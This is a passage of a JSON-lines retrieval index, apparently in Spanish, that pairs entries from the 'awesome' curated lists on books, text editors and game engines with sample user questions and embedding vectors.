0.08219, -0.02962, -0.01948, -0.07149, 0.02451, -0.00589, -0.04243, -0.00973, 0.01159, -0.02319, -0.05415, 0.08499, 0.05929, 0.01453, 0.07024, -0.12584, 0.04677, -0.11304, -0.01376, 0.04009, 0.12976, 0.10336, 0.17537, -0.01689, 0.0543, 0.0654, -0.08718, -0.00076, -0.01127, -0.0235, -0.03687, 0.06572, -0.01738, -0.11695, -0.07759, 0.02209, -0.00871, -0.0692, 0.05982, -0.01446, 0.00356, 0.07091, -0.03485, 0.05537, -0.04637, -0.1086, 0.01839, 0.07248, 0.071, 0.01344, -0.01633, 0.07596, -0.08095, -0.05872, 0.02238, 0.00268, 0.05962, 0.03119, -0.09795, -0.04391, -0.01276, -0.00827, 0.05863, 0.00532, 0.09736, -0.03225, 0.12281, 0.01665, -0.06636, 0.00797, -0.0743, -0.0406, -0.03426, -0.08293, -0.02537, -0.06568, 0.0065, -0.06416, -0.03708, -0.05164, -0.03267, -0.03814, -0.0619, 0.04143, 0.01588, -0.03326, 0.02871, -0.0276, -0.07583, 0.02072, 7e-05, -0.05814, 0.0271, -0.02031, -0.01874, -0.10067, -0.0186, -0.04997, 0.00504, 0.03196, -0.00489, -0.00996, 0.06868, -0.03349, 0.04324, 0.02821, -0.06196, 0.0501, -0.0628, -0.02079, -0.03131, -0.05862, 0.01252, 0.02025, 0.06635, 0.06664, -0.02278, 0.06673, -0.01858, -0.0191, -0.09563, 0.00282, 0.03232, 0.07764, 0.07141, -0.04428, -0.0606, -0.02109, -0.03697, 0.0258, 0.03216, 0.00824, 0.02333, -0.02985, -0.00366, -0.00906, 0.11113, -0.01622, -0.06187, -0.03368, -0.06763, -0.01997, -0.02557, -0.00632, -0.04265, -0.03475, 0.01909, 0.04142, -0.01337, -0.01789, -0.00714]} +{"tipo": "pregunta", "herramienta": "Books", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Books", "tema": "books", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Books: Free Programming Books. Go Books. R Books. Mind Expanding Books. Book Authoring. Elixir Books.", "indexar": "cual es una alternativa libre a los cursos pagos?", "v": [0.01064, 0.04094, -0.06329, 0.01086, -0.06421, -0.10369, 0.18876, -0.05807, -0.28242, -0.05813, -0.09537, -0.1327, -0.02297, 0.07964, -0.00436, -0.08153, 0.0559, 0.03738, 0.15905, 0.03601, -0.075, -0.08042, -0.09794, -0.07521, -0.11897, 0.02351, 0.05289, -0.10118, -0.1134, 0.09008, 0.08376, 0.01664, 0.0525, -0.11922, -0.0293, 0.06883, 0.09063, 0.10237, 0.05976, -0.0229, 0.01646, -0.00397, -0.00507, 0.03125, -0.00779, -0.1766, -0.02903, 0.10721, 0.06014, -0.01488, 0.01462, 0.03875, -0.05846, -0.02034, -0.00075, -0.01852, 0.08563, -0.08465, -0.09056, 0.0091, -0.03156, 0.10167, 0.02845, 0.022, 0.02428, 0.04749, 0.02925, 0.05037, -0.01125, 0.08742, 0.04804, -0.04405, -0.05057, 0.03034, -0.11228, 0.01757, -0.0271, -0.05887, 0.03452, -0.01336, 0.03654, -0.05828, -0.01633, 0.12406, -0.09167, 0.00145, -0.02053, -0.04521, 0.02191, 0.03546, -0.00242, 0.11574, 0.02967, 0.11413, -0.07309, -0.00095, -0.02357, -0.01562, 0.03052, 0.05604, 0.0343, 0.09503, -0.07431, -0.0217, -0.00314, 0.02945, 0.04051, 0.07786, -0.08128, 0.04917, 0.04783, 0.05877, 0.00743, 0.02539, 0.00913, -0.06083, -0.01992, 0.08903, 0.03766, -0.01425, -0.01931, 0.02192, -0.05607, -0.07932, 0.10581, 0.01977, 0.03153, 0.06804, -0.03638, 0.08428, 0.03687, -0.04167, -0.03071, -0.1153, -0.05663, -0.08835, 0.08873, 0.03638, 0.01621, 0.0112, 0.01906, 0.06755, 0.01571, -0.00658, 0.06322, -0.04278, 0.00327, -0.10669, -0.06861, -0.01589, -0.09992, 0.00508, -0.00553, 0.12354, -0.06814, -0.03215, -0.0062, -0.07657, -0.08006, 0.10087, 0.0133, -0.02813, 0.06197, -0.02889, -0.03218, -0.0368, 0.00036, 0.00986, -0.10367, 0.034, 0.06826, 0.08289, 0.01686, 0.00436, 0.0481, -0.09428, -0.00088, -0.15618, 0.01235, -0.02667, 0.04681, 0.0277, -0.07776, -0.05842, 0.00245, -0.04186, -0.02066, 0.09652, 0.00311, 0.05181, -0.06347, -0.00675, -0.15184, -0.07688, -0.02673, 0.02623, -0.05322, -0.10638, -0.01627, 0.00443, -0.04994, 0.04231, -0.00671, -0.04321, -0.05416, 0.00534, -0.04601, 0.06106, -0.00775, 0.05248, 0.03675, 0.01738, 0.09644, -0.04609, -0.03728, -0.01754, 0.00913, -0.00647, -0.02569, 0.02802, 0.02958, -0.00169, -0.03233, 0.0056, 0.0268, 0.0321, -0.00267, 0.07084, -0.07885, 0.02024, 0.00985, -0.00465, -0.05779, 0.01851, 0.00731, 0.00933, 0.00159, 0.02801, -0.00416, 0.01654, 0.07323, 0.10398, -0.02209, -0.04873, -0.04079, 0.0094, -0.08886, -0.03908, -0.05962, -0.03998, -0.0266, 0.06667, 0.03333, 0.0705, 0.04547, 0.02357]} +{"tipo": "pregunta", "herramienta": "Books", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Books", "tema": "books", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Books: Free Programming Books. Go Books. R Books. Mind Expanding Books. Book Authoring. Elixir Books.", "indexar": "con que recurso puedo leer documentaciΓ³n tΓ©cnica sin coste?", "v": [-0.01836, -0.01097, -0.16825, -0.14367, 0.11761, -0.1219, 0.05961, 0.0765, -0.11839, -0.01977, -0.15239, -0.00382, -0.01776, -0.0592, 0.05693, -0.03457, 0.06752, 0.03852, 0.04194, -0.09422, 0.04781, -0.21303, -0.10383, 0.06397, 0.0035, 0.04006, 0.02794, -0.17479, -0.02623, -0.11036, -0.02533, 0.07888, 0.01117, -0.0106, -0.04732, 0.08307, -0.01276, -0.02441, -0.07966, -0.02957, 0.03974, -0.10519, -0.03727, 0.05295, 0.0248, -0.08065, -0.03748, 0.08545, -0.05321, -0.03604, 0.04124, -0.00447, -0.01696, -0.06422, -0.05018, -0.01769, 0.2, -0.04772, -0.00609, -0.1868, 0.06265, 0.03615, -0.03923, -0.01092, 0.05959, 0.01474, 0.0887, 0.07209, 0.00697, -0.09731, -0.08642, 0.01046, -0.04039, -0.0411, -0.06018, -0.00334, -0.01018, 0.00882, 0.0776, 0.02155, -0.0063, -0.04078, -0.07143, -0.08062, -0.06237, 0.02637, 0.04452, -0.03363, 0.16196, -0.21022, 0.02721, 0.01775, -0.02854, -0.0317, -0.03165, 0.02212, 0.04527, -0.01048, -0.02132, 0.08015, -0.05125, 0.01054, -0.07401, 0.02477, 0.10005, 0.08796, 0.02081, -0.03533, -0.04454, -0.01567, -0.12235, 0.07039, -0.07933, 0.01195, -0.09523, -0.06306, -0.03304, -0.0455, -0.05759, 0.00549, 0.078, -0.05032, -0.04706, -0.00051, 0.11395, -0.01584, 0.02886, 0.0532, 0.07142, 0.03246, 0.04252, 0.01876, -0.02787, -0.00944, 0.05977, -0.03277, -0.02354, -0.02868, -0.05696, -0.0646, -0.02796, 0.02754, -0.04339, 0.02407, -0.0212, -0.03136, 0.06962, -0.05786, -0.0744, -0.13626, 0.06281, -0.06432, 0.00664, 0.12242, -0.07206, 0.03837, 0.16118, 0.00579, -0.03332, -0.02092, 0.02308, 0.0903, -0.0282, 0.04375, -0.02955, -0.04671, -0.101, -0.05462, -0.01834, 0.02717, -0.02803, 0.00679, 0.03241, -0.01354, 0.08351, -0.08409, 0.02795, -0.03597, -0.04207, -0.05507, -0.02563, -0.04042, -0.06565, -0.09651, 0.00629, -0.00873, -0.06846, -0.00749, 0.04947, -0.00018, -0.03089, 0.06366, -0.0069, 0.02254, -0.07241, -0.00641, -0.09795, -0.03784, 0.01252, -0.02247, -0.04352, 0.05618, -0.00561, -0.04622, 0.01809, 0.03504, -0.0541, -0.00057, -0.05839, 0.06312, -0.01025, -0.04774, 0.05811, -0.02302, -0.02061, 0.06141, -0.01334, -0.05005, -0.03856, 0.04995, 0.05679, 0.07518, 0.02453, 0.01717, 0.08816, -0.05004, 0.06363, 0.03443, -0.01726, 0.02922, 0.00266, 0.03944, -0.00815, -0.0101, 0.02749, 0.07005, 0.03433, -0.06452, -0.08611, 0.01349, 0.01327, 0.06716, -0.01678, -0.0145, 0.02, -0.05318, -0.09169, 0.01173, 0.03038, -0.04693, 0.02399, 0.02303, 0.04407, -0.04926, 0.02572, -0.08132]} +{"tipo": "pregunta", "herramienta": "Editors", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Editors", "tema": "editors", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Editors: Sublime Text. Vim. Neovim β€” Vim-fork focused on extensibility and usability. Emacs. Visual Studio Code β€” Cross-platform open-source text editor.", "indexar": "que programa puedo usar para editar texto de forma rΓ‘pida y potente?", "v": [-0.03729, 0.07453, -0.25677, -0.1175, 0.07674, 0.00102, 0.01236, -0.11133, -0.08434, -0.11052, -0.05314, 0.00307, -0.00906, -0.05524, -0.13807, 0.00879, 0.0805, -0.09228, 0.04918, -0.03571, 0.06086, -0.17953, -0.1224, -0.15914, -0.01172, 0.0127, 0.08273, -0.00181, -0.09551, -0.08313, -0.0446, 0.07678, 0.07237, -0.12801, -0.07041, 0.01701, 0.02587, 0.03958, -0.02381, 0.16732, 0.03244, 0.06292, -0.03126, 0.01314, 0.02936, 0.07238, 0.05221, 0.01405, -0.03895, -0.02011, 0.00551, -0.06414, -0.08557, -0.0116, -0.05976, -0.10807, 0.13501, -0.1398, -0.13353, -0.02933, 0.13402, 0.07037, -0.03559, -0.09385, -0.05104, 0.0167, 0.05312, -0.06814, -0.13837, 0.05034, -0.066, 0.02274, 0.05285, 0.0488, -0.02846, 0.07277, -0.16697, -0.02507, 0.06166, -0.02472, -0.05406, 0.01026, -0.03082, 0.03176, -0.05986, -0.03884, 0.05315, -0.09722, -0.01089, -0.0531, 0.01966, -0.0138, 0.09383, 0.00974, 0.04211, -0.05521, 0.04172, 0.03577, 0.07519, 0.04976, 0.07791, -0.07941, -0.05269, 0.13281, 0.02835, -0.03224, -0.02917, -0.02352, -0.01434, 0.0172, -0.00765, -0.03577, -0.0636, -0.03571, -0.00719, 0.01285, -0.02053, -0.03456, -0.03214, -0.11391, -0.06011, 0.02347, -0.04636, -0.02085, 0.14768, 0.02801, 0.01191, 0.05838, -0.05479, 0.0552, 0.02525, 0.00229, -0.04374, -0.13383, -0.0045, -0.08279, -0.03509, 0.05693, 0.04578, -0.03645, -0.03651, 0.07463, -0.06261, 0.00089, -0.01032, 0.00443, 0.00307, -0.03153, 0.02113, 0.01182, 0.06554, -0.0107, -0.03017, 0.02734, -0.0909, -0.069, 0.06202, 0.01069, -0.11206, 0.0389, -0.0865, 0.01737, -0.01625, -0.02022, 0.07516, -0.04084, -0.045, -0.01499, 0.02384, 0.08183, 0.0159, 0.03743, 0.08708, -0.02981, 0.04912, -0.00772, -0.05259, 0.03746, -0.02242, -0.01787, -0.03178, 0.0119, -0.02682, 0.02599, -0.01531, 0.04648, 0.03997, 0.0386, -0.01708, -0.02567, -0.02228, 0.07162, 0.04218, -0.04321, -0.03243, 0.00442, -0.06419, -0.02356, 0.02817, -0.09402, -0.08538, -0.09512, -0.00763, -0.02543, 0.06671, 0.04626, -0.05216, 0.0191, 0.02798, 0.12213, 0.00742, 0.00438, 0.06823, 0.01313, -0.04145, -0.03637, 0.00504, -0.00163, 0.05073, 0.03649, 0.02498, 0.02809, 0.04873, 0.06675, 0.09307, -0.06659, -0.00605, -0.00761, -0.00287, 0.03248, 0.02356, -0.03406, -0.01293, -0.06327, 0.01838, -0.04219, 0.0028, -0.01077, -0.05934, -0.07138, -0.02114, 0.05773, -0.01203, 0.00149, -0.05971, 0.0155, -0.10365, 0.00751, -0.06793, -0.02264, -0.03178, 0.02767, 0.08011, -0.10833, 0.05771, 0.04116]} +{"tipo": "pregunta", "herramienta": "Editors", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Editors", "tema": "editors", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Editors: Sublime Text. Vim. Neovim β€” Vim-fork focused on extensibility and usability. Emacs. Visual Studio Code β€” Cross-platform open-source text editor.", "indexar": "con quΓ© herramienta soy capaz de programar o escribir cΓ³digo sin instalar nada extra?", "v": [0.00213, 0.05713, -0.1819, -0.16586, -0.01903, -0.29382, -0.02768, -0.00719, -0.09045, -0.0896, -0.09376, -0.06649, 0.0073, -0.1478, 0.05366, 0.03745, 0.14939, -0.07158, 0.04899, 0.06305, -0.00559, 0.02524, -0.11193, -0.0995, 0.01045, -0.01361, -0.02228, 0.02943, -0.15843, 0.03081, -0.06481, 0.08903, 0.12799, -0.10289, -0.11495, 0.07111, 0.09533, 0.02692, -0.02526, 0.10104, 0.00285, 0.13837, -0.00693, 0.12375, 0.03701, -0.02297, 0.09382, 0.00013, 0.06041, 0.01351, -0.03649, -0.09668, -0.02224, -0.02404, 0.0336, -0.05738, 0.13886, -0.13907, -0.03578, -0.03925, -0.02232, 0.07477, -0.07301, -0.04255, 0.00761, 0.02188, 0.02239, -0.01419, -0.10955, 0.09297, -0.014, 0.01017, -0.05216, -0.00722, 0.09574, 0.04413, -0.04171, -0.07253, 0.07281, 0.071, 0.00341, -0.04962, -0.05618, -0.03813, 0.06439, -0.09341, 0.02119, -0.07757, 0.00108, -0.07569, 0.08705, -0.00087, 2e-05, -0.04793, 0.08567, -0.00751, 0.17171, 0.02045, 0.0263, 0.03762, 0.09103, -0.13638, 0.01363, 0.1278, 0.02597, 0.03203, 0.03346, -0.01259, 0.0465, -0.02032, 0.01379, -0.01704, -0.0616, -0.00457, -0.03735, -0.00716, -0.01066, -0.00697, -0.02353, -0.09663, -0.06457, 0.08117, -0.06403, 0.01146, 0.05367, 0.00846, -0.02053, 0.12733, -0.06611, -0.05235, -0.00675, -0.08931, 0.00034, -0.01342, -0.02162, 0.05875, 0.04648, -0.04292, -0.00466, -0.01037, -0.01801, 0.024, -0.01513, 0.02151, -0.03065, 0.08013, -0.04401, -0.03158, -0.07542, -0.01534, 0.02578, 0.06395, 0.01143, 0.0841, -0.15012, -0.0186, 0.03906, 0.01775, -0.10612, -0.04164, -0.11846, -0.00711, -0.04142, -0.03261, 0.01327, -0.04745, -0.01095, -0.02479, 0.05617, 0.07991, 0.02831, 0.02699, 0.14315, -0.02195, 0.05821, -0.04447, -0.00505, 0.00465, -0.06389, -0.02847, -0.05245, 0.06299, 0.03384, -0.03389, -0.00052, -0.00598, 0.05415, -0.02855, -0.02005, -0.01644, 0.03366, 0.0435, -0.01042, -0.05312, -0.00903, 0.0011, -0.01744, -0.03688, 0.03155, -0.06005, -0.02943, 0.07448, -0.02067, -0.01568, 0.05488, 0.07459, -0.07631, -0.0235, -0.01778, 0.06958, 0.06338, -0.0306, -0.02128, 0.01355, -0.02013, -0.02024, -0.02781, 0.0622, 0.07371, -0.00692, 0.05035, -0.03713, 0.02724, -0.02899, -0.02401, -0.05183, -0.00962, 0.07126, -0.00255, 0.04849, -0.01017, -0.03279, -0.01457, 0.01566, -0.00649, -0.01122, -0.02359, -0.03077, -0.04484, -0.03197, -0.01538, 0.02224, 0.03343, -0.07864, -0.04564, 0.00082, -0.01089, -0.03694, -0.05855, -0.03296, -0.02511, -0.00333, 0.07209, -0.07853, 0.01738, 0.05044]} +{"tipo": "pregunta", "herramienta": "Editors", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Editors", "tema": "editors", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Editors: Sublime Text. Vim. Neovim β€” Vim-fork focused on extensibility and usability. Emacs. Visual Studio Code β€” Cross-platform open-source text editor.", "indexar": "cual es una alternativa libre a los editores tradicionales como Word?", "v": [0.14148, 0.02317, 0.0122, 0.0685, -0.03275, 0.08362, 0.08763, -0.07777, -0.07822, -0.11087, -0.06701, -0.09717, -0.00052, -0.05722, 0.07057, -0.04927, 0.17008, -0.08391, 0.08902, 0.00286, 0.01854, -0.05528, -0.08046, -0.02478, 0.05256, -0.14066, 0.023, 0.05963, -0.0081, 0.06376, -0.01784, 0.09303, 0.09753, -0.06431, -0.0508, 0.06555, 0.04556, 0.1354, -0.09294, 0.012, 0.0608, -0.0029, -0.0807, 0.05198, -0.05326, -0.00243, -0.11087, 0.0993, 0.02002, 0.10406, -0.02849, -0.00345, -0.03401, 0.0458, 0.06693, -0.04669, 0.19951, -0.00344, -0.1743, 0.03311, -0.07085, 0.18918, 0.04999, -0.05641, 0.01911, 0.02675, -0.04588, -0.06145, -0.01738, 0.09556, 0.06636, 0.03639, 0.05973, -0.00216, -0.07558, 0.06349, -0.07813, -0.00328, -0.00296, 0.03277, 0.06236, -0.04225, 0.06122, 0.03715, -0.0305, -0.12464, 0.04093, -0.18187, -0.09635, 0.03401, 0.01355, 0.00507, 0.01715, 0.08553, -0.00555, -0.13843, 0.03864, -0.02058, 0.01172, 0.15222, 0.08678, -0.02958, -0.04534, -0.02519, -0.04757, -0.08253, 0.07439, 0.03246, -0.03683, 0.02673, 0.02971, 0.04583, 0.03785, 0.02999, 0.01274, -0.02485, -0.00972, -0.02059, 0.01614, -0.04202, -0.02236, -0.01232, -0.02639, -0.00057, 0.01269, 0.03776, -0.02685, 0.03656, -0.0894, 0.04709, 0.04194, 0.00775, -0.02054, -0.06434, -0.12099, -0.02355, 0.11183, -0.03538, 0.0434, -0.01218, -0.04761, -0.00614, -0.02778, -0.0886, 0.07787, 0.00672, 0.04043, -0.02832, -0.08859, -0.02667, -0.08908, 0.01705, -0.03546, 0.10824, -0.03147, 0.05342, -0.04125, -0.04087, -0.0483, 0.16153, -0.00382, -0.08532, 0.00853, -0.04497, -0.054, -0.03857, -0.00536, -0.0665, 0.0221, -0.05968, -0.02631, 0.02952, -0.00481, -0.0325, 0.08548, -0.00058, -0.05673, -0.01586, 0.08399, -0.05316, -0.02226, 0.04954, -0.16459, -0.05619, 0.01189, -0.04546, 0.05909, 0.00635, -0.00672, 0.03135, -0.04519, 0.05214, -0.08271, -0.1514, -0.03896, 0.03281, -0.07075, -0.02631, 0.01975, -0.04814, -0.03485, -0.00447, 0.00591, -0.04102, 0.0228, 0.00865, -0.02435, 0.0603, -0.02662, 0.11858, -0.01188, 0.0163, 0.00353, 0.01518, -0.05874, -0.00248, 0.02742, -0.0769, 0.00066, 0.01994, 0.10526, 0.00864, 0.0659, -0.01965, 0.01913, -0.03605, 0.02913, 0.07306, -0.01267, 0.0494, -0.02958, -0.0113, -0.06308, 0.0156, 0.06135, 0.04886, 0.03851, -0.00809, -0.02787, -0.02105, 0.06421, 0.06235, -0.03566, -0.01437, -0.04919, -0.00421, -0.10295, -0.02863, -0.05994, -0.01226, -0.04298, 0.05002, 0.05115, -0.01329, 0.03217, -0.07414]} +{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Development. Game Talks. Godot β€” Game engine. Open Source Games. Unity β€” Game engine. Chess. LΓ–VE β€” Game engine. PICO-8 β€” Fantasy console. Game Boy Development. Construct 2 β€” Game engine. Gideros β€” Game engine. Minecraft β€” Sandbox video game. ComputerCraft β€” Minecraft mod that adds programmable computers. Game Datasets β€” Materials and datasets for Artificial Intelligence in games. Haxe Game Development β€” A high-level strongly typed programming language used to produce cross-platform native code. libGDX β€” Java game framework. PlayCanvas β€” Game engine. Game Remakes β€” Actively maintained open-source game remakes. Flame β€” Game engine for Flutter. Discord Communities β€” Chat with friends and communities. CHIP-8 β€” Virtual computer game machine from the 70s. Games of Coding β€” Learn a programming language by making games. Esports β€” Video games played as a sport. Learn Gamedev β€” The craft of video game creation. Game Engine Development β€” Building software to speed up game creation. GameMaker β€” Game engine.", "indexar": "con que programa puedo crear un juego desde cero sin pagar licencias?", "v": [0.01419, 0.0282, -0.10474, -0.07903, 0.00516, -0.10524, -0.04831, -0.01989, -0.13163, -0.1241, 0.06294, -0.14815, 0.01872, -0.1298, 0.0602, 0.04367, 0.02071, -0.05326, 0.06192, 0.05611, 0.03693, 0.02467, 0.06025, -0.17684, 0.0034, 0.05126, 0.10257, -0.12246, -0.14016, 0.07928, -0.05939, -0.0002, 0.20021, -0.08388, 0.10491, -0.03364, 0.10094, 0.04288, 0.12626, 0.03888, 0.05052, 0.06398, 0.01454, -0.00306, -0.05267, -0.0651, 0.14239, 0.0603, 0.03113, -0.08719, 0.04964, -0.01923, -0.10931, -0.17437, 0.1048, -0.10299, 0.05069, -0.10422, -0.01285, -0.05736, -0.0795, 0.09037, 0.099, -0.04733, -0.03125, 0.07924, 0.11793, 0.05916, 0.02268, 0.0795, -0.0868, 0.00665, 0.00944, -0.01809, -0.00436, 0.00718, -0.06468, -0.17758, 0.01579, -0.00364, 0.03465, -0.06297, -0.0157, -0.0384, -0.02869, 0.0224, 0.05974, -0.03129, 0.00526, 0.00402, -0.02761, 0.05768, -0.04459, 0.0725, 0.0317, -0.12921, 0.14723, 0.01863, -0.02398, 0.06236, -0.09251, 0.0153, -0.09972, 0.05239, -0.03074, 0.11982, 0.12916, -0.0699, -0.07827, 0.08965, -0.02077, 0.07002, -0.05745, -0.00829, -0.02157, 0.05303, -0.00465, 0.01801, 0.116, 0.05806, -0.07369, 0.01685, 0.02949, 0.00957, 0.06297, -0.02375, -0.06059, 0.16289, -0.06932, 0.01214, 0.01129, 0.01517, -0.02132, 0.03113, -0.0466, -0.0115, 0.01136, 0.07342, -0.10519, 0.04032, 0.06206, 0.11254, 0.08598, 0.02709, 0.0262, 0.03413, -0.05844, -0.12278, -0.05078, -0.019, 0.0178, 0.04213, -0.04296, 0.0793, -0.09824, 0.0991, 0.03517, 0.02955, -0.00574, 0.02772, 0.01731, 0.08623, -0.06544, -0.08444, 0.04058, 0.00427, -0.00242, 0.0089, 0.03683, 0.04739, -0.08714, -0.00276, 0.04885, -0.03267, 0.03795, 0.03116, -0.01757, -0.04116, -0.06311, -0.03194, -0.0549, 0.0169, -0.04123, -0.00403, -0.03995, 0.00066, -0.00673, 0.03114, 0.07981, 0.01972, -0.05269, 0.06318, -0.02286, 0.00791, -0.01628, -0.0312, 0.06294, -0.0307, -0.05986, -0.01018, -0.01897, 0.01937, -0.00378, -0.0122, 0.01928, 0.00696, 0.01038, 0.07874, 0.01504, 0.0603, -0.02993, -0.05426, 0.01007, 0.03531, 0.03064, -0.00852, -0.00348, -0.02207, 0.01503, 0.001, 0.04118, -0.04154, 0.01767, -0.00966, 0.02612, -0.0646, 0.02768, 0.09153, 0.03218, -0.00108, -0.00479, -0.00108, -0.04505, -0.01135, 0.02306, 0.04004, 0.02557, -0.0364, -0.0426, -0.00409, -0.00063, 0.04496, 0.00655, -0.05704, -0.0156, -0.06676, -0.0203, -0.05465, -0.03136, -0.02393, -0.01458, 0.03957, 0.02594, -0.00024, -0.00744, 0.04913]} +{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Development. Game Talks. Godot β€” Game engine. Open Source Games. Unity β€” Game engine. Chess. LΓ–VE β€” Game engine. PICO-8 β€” Fantasy console. Game Boy Development. Construct 2 β€” Game engine. Gideros β€” Game engine. Minecraft β€” Sandbox video game. ComputerCraft β€” Minecraft mod that adds programmable computers. Game Datasets β€” Materials and datasets for Artificial Intelligence in games. Haxe Game Development β€” A high-level strongly typed programming language used to produce cross-platform native code. libGDX β€” Java game framework. PlayCanvas β€” Game engine. Game Remakes β€” Actively maintained open-source game remakes. Flame β€” Game engine for Flutter. Discord Communities β€” Chat with friends and communities. CHIP-8 β€” Virtual computer game machine from the 70s. Games of Coding β€” Learn a programming language by making games. Esports β€” Video games played as a sport. Learn Gamedev β€” The craft of video game creation. Game Engine Development β€” Building software to speed up game creation. GameMaker β€” Game engine.", "indexar": "cual es una alternativa libre a Unity para desarrollar juegos 2D?", "v": [-0.13045, 0.02738, -0.14653, -0.04167, -0.07073, 0.04916, -0.19427, 0.01358, -0.02188, -0.06827, -0.09152, -0.18609, -0.17292, 0.03262, -0.1209, -0.18623, 0.0884, -0.07373, 0.09178, -0.03664, -0.02516, 0.00609, -0.01022, -0.11903, -0.03141, -0.0006, 0.0509, -0.00114, 0.02841, -0.04833, 0.05247, 0.01695, 0.06412, -0.06388, -0.0494, -0.13443, 0.03134, 0.08817, 0.13939, -0.00095, 0.01097, -0.00883, -0.03307, 0.02587, 0.08067, 0.02702, 0.02033, 0.03356, 0.00304, 0.0032, 0.02224, 0.09062, -0.05687, -0.07672, 0.12209, -0.05509, 0.1053, -0.07104, -0.07803, -0.0714, -0.06686, -0.03825, 0.05384, -0.06576, -0.0373, 0.01933, -0.11401, 0.07741, -0.04526, 0.14779, -0.00919, 0.0172, -0.03743, -0.04573, -0.13728, 0.15712, -0.07197, -0.08617, -0.04058, 0.06596, 0.09619, -0.12069, -0.05813, 0.05241, -0.00058, -0.03091, 0.06851, -0.0956, -0.08797, 0.04092, 0.06335, -0.01261, -0.08792, 0.06732, 0.04562, -0.14121, 0.05983, 0.06748, 0.04754, 0.0133, -0.02244, -0.0237, -0.13207, 0.00334, -0.05824, -0.00428, 0.03949, 0.06255, -0.06228, -0.05015, 0.04842, 0.08672, 0.0027, 0.09649, -0.0658, -0.02547, -0.02468, -0.00463, 0.10764, -0.02566, -0.07432, 0.00148, -0.00341, -0.0401, -0.01298, 0.02941, 0.01175, 0.05689, -0.09444, 0.01756, 0.04533, -0.03559, -0.07224, -0.02106, -0.17573, 0.03091, 0.12626, 0.05998, -0.07024, 0.03808, 0.07557, 0.07992, 0.00369, 0.02705, 0.07012, 0.08753, 0.03836, -0.05119, -0.04038, 0.00534, -0.03143, 0.03843, 0.00251, 0.04355, -0.08033, 0.06686, -0.044, 0.02492, -0.10435, 0.01653, -0.04743, 0.0218, -0.02457, 0.02551, -0.03141, -0.00109, 0.0156, -0.01105, -0.05204, -0.02441, -0.03856, 0.00046, 0.06119, -0.07506, 0.04435, -0.01403, -0.02592, -0.03958, -0.03297, -0.06338, 0.00736, 0.02672, -0.01834, 0.0376, -0.05153, -0.09176, -0.00823, -0.04944, 0.04428, 0.02267, -0.02202, 0.04806, -0.03809, -0.05513, -0.05477, -0.02702, 0.04675, -0.05678, -0.02428, -0.0103, -0.04291, 0.00511, -0.04565, 0.00167, -0.04991, 0.04827, -0.01747, -0.04267, -0.029, 0.02377, 0.03312, 0.02776, 0.08781, 0.06937, 0.03321, -0.00558, 0.04106, 0.0313, -0.02058, -0.00268, -0.02471, -0.04603, -0.03008, -0.06445, 0.03968, 0.04239, 0.03169, 0.08068, -0.01871, 0.04875, 0.06085, 0.01447, 0.03362, 0.03748, -0.06187, 0.03444, 0.05446, 0.00257, -0.00355, 0.0118, 0.05672, -0.00474, -0.03037, -0.01363, -0.04482, -0.05435, -0.05079, -0.01368, 0.00207, -0.0787, -0.08661, -0.02617, 0.00481, 0.03102, -0.04366, -0.01766]} +{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Development. Game Talks. Godot β€” Game engine. Open Source Games. Unity β€” Game engine. Chess. LΓ–VE β€” Game engine. PICO-8 β€” Fantasy console. Game Boy Development. Construct 2 β€” Game engine. Gideros β€” Game engine. Minecraft β€” Sandbox video game. ComputerCraft β€” Minecraft mod that adds programmable computers. Game Datasets β€” Materials and datasets for Artificial Intelligence in games. Haxe Game Development β€” A high-level strongly typed programming language used to produce cross-platform native code. libGDX β€” Java game framework. PlayCanvas β€” Game engine. Game Remakes β€” Actively maintained open-source game remakes. Flame β€” Game engine for Flutter. Discord Communities β€” Chat with friends and communities. CHIP-8 β€” Virtual computer game machine from the 70s. Games of Coding β€” Learn a programming language by making games. Esports β€” Video games played as a sport. Learn Gamedev β€” The craft of video game creation. Game Engine Development β€” Building software to speed up game creation. GameMaker β€” Game engine.", "indexar": "que herramienta sirve para aprender programando usando videojuegos?", "v": [0.11073, 0.05853, -0.09771, -0.20885, 0.01251, -0.0922, -0.0707, -0.13333, 0.05602, -0.21064, 0.00229, -0.1441, -0.07511, -0.03588, -0.03965, 0.09678, 0.14245, -0.11248, 0.03834, 0.0111, 0.04539, 0.00093, -0.08897, -0.0836, -0.05047, 0.04876, 0.04584, -0.05408, -0.099, 0.06519, -0.0573, 0.04095, 0.08028, -0.13244, -0.11125, -0.12164, 0.00427, 0.02013, -0.00462, 0.10984, 0.02295, 0.07436, -0.04561, -0.02587, 0.05044, 0.03562, 0.08246, -0.01631, -0.01351, 0.06668, 0.05906, -0.03285, -0.02629, -0.0699, 0.05854, -0.13821, 0.09035, -0.16184, 0.00128, -0.09149, -0.10792, -0.02569, 0.02486, -0.04291, 0.02169, -0.00353, 0.07255, 0.02981, -0.09099, 0.12456, -0.07158, 0.03847, 0.07022, 0.00032, -0.04513, 0.02934, 0.01802, 0.00767, 0.06706, -0.11558, -0.0167, -0.09133, -0.05367, -0.00933, 